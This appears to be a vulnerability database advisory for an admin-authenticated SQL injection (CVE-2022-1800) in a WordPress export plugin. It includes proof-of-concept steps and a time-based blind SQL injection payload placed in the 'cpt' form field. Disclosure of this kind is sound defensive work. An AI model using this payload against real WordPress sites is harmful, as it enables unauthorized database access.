Lucene search
Asif Nawaz MinhasWPEX-ID:4267109C-0CA2-441D-889D-FB39C235F128HistoryMay 20, 2022 - 12:00 a.m.
Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection
2022-05-2000:00:00
Asif Nawaz Minhas
343
wordpress
export
xml/csv
sql injection
admin
migrate posts
vulnerability
EPSS
0.001
Percentile
37.7%
The plugin does not sanitize the cpt POST parameter when exporting post data before using it in a database query, leading to an SQL injection vulnerability.
1. Go to the All Export > New Export screen in the WordPress admin.
2. Now click on Specific Post Type > Posts.
3. Click now on Migrate Posts and intercept this request and look for the name cpt:
Content-Disposition: form-data; name="cpt"
post
Change it to:
Content-Disposition: form-data; name="cpt"
post'+(select*from(select(sleep(10)))a)+'
Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.
Related
cvelist
cvelist
wpvulndb
wpvulndb
Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection
2022-05-20 00:00:00
patchstack
patchstack
cnvd
cnvd
WordPress Export any WordPress data to XML/CSV plugin SQL注入漏洞
2022-06-15 00:00:00
nvd
nvd
CVE-2022-1800
2022-06-13 13:15:13
cve
cve
CVE-2022-1800
2022-06-13 13:15:13
prion
prion
Sql injection
2022-06-13 13:15:00